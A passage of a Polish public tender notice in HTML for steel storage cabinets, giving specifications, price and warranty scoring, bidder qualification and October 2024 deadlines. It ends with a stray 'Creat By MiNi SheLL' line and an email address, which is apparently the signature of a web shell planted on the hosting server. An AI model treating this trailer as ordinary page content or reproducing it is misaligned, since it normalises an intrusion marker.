kryterium. Maksymalną ilość punktów (40 pkt.) w niniejszym kryterium uzyska oferta, w której Wykonawca wskaże, że zaoferuje co najmniej 60 miesięczny okres gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Część 3: Szafa z półkami wysuwanymi, zamykana roletą:<br/>1)	ilość szaf: 2 sztuki;<br/>2)	wymiar całkowity/zewnętrzny: około 220 cm (zależna od rozmieszczenia półek), dzielona na 2 części ( górną i dolną) z możliwością rozmontowania i przemieszczania;<br/>3)	ściany boczne i tylna oparte o konstrukcję słupkowej wykonane z jednego formatu blachy zimnowalcowanej o grubości min. 1,5 mm;<br/>4)	rama konstrukcyjna, stalowa - profile 60x40x2mm i 40x20x2mm;<br/>5)	wieniec górny wykonany z profilu stalowego wypełnionego blachą;<br/>6)	maksymalnie wysunięte półki do 2/3 głębokości - zabezpieczenie półek przed wysunięciem w postaci ogranicznika plus blokada ręczna;<br/>7)	półki na prowadnicach rolkowych z łożyskami kulkowymi, które zapewnią płynnie funkcjonowanie półki;<br/>8)	wymiary wewnętrzne półek: (123x92x7cm) szer. x gł. x wys.;<br/>9)	nośność pojedynczej półki powinna wynosić przynajmniej 30 kg;<br/>10)	szafa na nóżkach z możliwością regulacji;<br/>11)	zamykanie szafy w formie rolety opuszczanej w dół z możliwością zamknięcia na klucz - roleta dla każdego modułu osobno zamykana na zamek; <br/>12)	brak ostrych krawędzi;<br/>13)	każda półka wyposażona w transparentną etykietę/kieszeń z możliwością umieszczenia w niej opisu z trwałego materiał np. poliwęglanu litego;<br/>14)	szafę wyposażyć w zestaw kołowy skrętny FI 100mm mocowany na płytkę z kołem z elastyczną oponką i hamulcem. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 110000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39173000-5 - Meble do przechowywania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający w zakresie każdej z części zamówienia wyznaczył dwa kryteria oceny i wyboru ofert:<br/>•	Cena (C) 60%<br/>•	Gwarancja i rękojmia (G)40%<br/><br/>3.	Ocena ofert w kryterium „Cena” (C). <br/>„Cena” rozumiana jako całkowita wartość oferty brutto, obejmująca kwotę za realizację całego zamówienia w ramach danej części zamówienia.<br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>C obliczana = (X min : X obliczana ) x 60 <br/>gdzie: <br/>•	C obliczana - liczba punktów badanej oferty w kryterium „cena”;<br/>•	X min – najniższa cena pośród złożonych ważnych ofert;<br/>•	X obliczana – cena badanej oferty.<br/>Maksymalną ilość punktów (60 pkt.) w niniejszym kryterium uzyska Wykonawca który <br/>w ofercie wskaże najniższa cenę. <br/><br/>4.	Ocena ofert w kryterium „Gwarancja i rękojmia” (W)<br/>Gwarancja i rękojmia - rozumiana jako zobowiązanie Wykonawcy do zapewnienia odpowiedniej jakości elementów składających się na przedmiot umowy (materiałów), ich wykonania i montażu. <br/><br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>Jeżeli Wykonawca wskaże w Formularzu Ofertowym, że oferuje: <br/>-	60 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 40 pkt,<br/>-	48 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 30 pkt. <br/>-	36 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 20 pkt<br/>-	24 miesięcy gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż, wówczas jego oferta otrzyma 10 pkt<br/>Wykonawca winien zaznaczyć jedną z opcji w tym zakresie w formularzu ofertowym. <br/>W przypadku jeśli Wykonawca nie zaznaczy żadnej z opcji, Zamawiający uzna, że Wykonawca oferuje 12 miesięczny okres gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż i nie przyzna dodatkowym punktów w tym kryterium. Maksymalną ilość punktów (40 pkt.) w niniejszym kryterium uzyska oferta, w której Wykonawca wskaże, że zaoferuje co najmniej 60 miesięczny okres gwarancji i rękojmi na dostarczone elementy stanowiące przedmiot umowy oraz ich odpowiedni montaż.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu, dotyczące: zdolności technicznej lub zawodowej.<br/>2.	W celu spełniania warunku, o którym mowa w ust. 1 Wykonawca musi wykazać, że: wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie (w ramach jednej umowy), które swoim zakresem obejmowało: dostawę mebli magazynowych, lub mebli metalowych o wartości co najmniej: 60 000,00 zł netto.<br/>3.	W przypadku jeśli Wykonawca oświadczy, że spełnia warunek udziału, o którym mowa w ust. 2 może złożyć ofertę jedną lub więcej części zamówienia. <br/>4.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w ust. 2, polegać na zdolności technicznej, zawodowej innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków prawnych, zgodnie z rozdziałem XI SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do Formularza Ofertowego (załącznik Nr 1 SWZ) należy dołączyć (w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym):<br/>1)	Oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do SWZ);<br/>2)	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy)<br/>3)	W przypadku podmiotów wspólnie składających ofertę, Wykonawca zobligowany jest załączyć oświadczenie, o którym mowa w rozdziale XII ust. 3 SWZ – wg. wzoru stanowiącego załącznik nr 7 do SWZ).<br/>4)	W przypadku polegania na zasobach innego podmiotu Wykonawca zobligowany jest załączyć oświadczenia, o których mowa w rozdziale XI SWZ tj: <br/>a)	zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów Wykonawcy (wg. wzoru stanowiącego załącznik nr 6 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>b)	oświadczenie innego podmiotu (wg wzoru stanowiącego załącznik Nr 3 do SWZ) potwierdzające brak podstaw wykluczenia tego podmiotu;<br/>UWAGA! Zobowiązanie podmiotu trzeciego i oświadczenie musi być podpisane, przez osobę upoważnioną do reprezentowania podmiotu trzeciego, z uwzględnieniem zapisów rozdziału XII ust. 5 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być złożone w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, którym mowa w art. 125 ust. 1 Pzp (o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu), składa każdy z Wykonawców tworzących Konsorcjum. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	W zakresie spełniania warunków udziału w postępowaniu, Wykonawcy wspólnie ubiegający się o zamówieniu wykażą spełnianie jeśli przynajmniej jeden z podmiotów tworzących konsorcjum wykaże, że spełnia w całości warunek, o którym mowa w rozdziale IX ust. 2 SWZ. <br/>4.	Zgodnie z art. 117 ust. 4 Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w oświadczeniu stanowiącym załącznik nr 7 do SWZ, które elementy zamówienia wykonają poszczególni Wykonawcy. <br/>5.	Oświadczenie, o którym mowa w ust. 4 podlega uzupełnieniu na zasadach określonych w art. 128 ust. 1 Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zmiany treści umowy mogą dotyczyć:<br/>1)	przedłużenia terminu zakończenia realizacji Umowy<br/>2)	wprowadzenia rozwiązań zamiennych w stosunku do „Projektu”<br/>3)	zmiany parametrów lub wymiarów pierwotnie określonych w „Projekcie”<br/>4)	podwykonawców wskazanych w ofercie<br/>5)	zakresu i rodzaju (usług/dostaw/robót) zleconych prac podwykonawcom<br/>6)	zmiany wysokości wynagrodzenia należnego Wykonawcy<br/>7)	wynagrodzenia należnego Wykonawcy<br/>8)	Zasad odbioru przedmiotu Umowy<br/>Szczegółowe informacje odnośnie rodzaju i zakres zmian umowy oraz warunków ich wprowadzenia określa § 15 Projektu Umowy (załącznik 5 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę tj. Formularz Ofertowy oraz pozostałe dokumenty i oświadczenia, o których mowa w rozdziale XVIII SWZ należy złożyć pod rygorem nieważności w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej oparzonej podpisem zaufanym lub podpisem osobistym na Platformie dostępnej pod adresem: https://mnk.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-15 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawcę, w stosunku do którego zachodzi<br/>którakolwiek z okoliczności, o której mowa w: art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, (Dz. U.<br/>2022 poz. 835), zwana dalej „UOBN”.

Creat By MiNi SheLL
Email: jattceo@gmail.com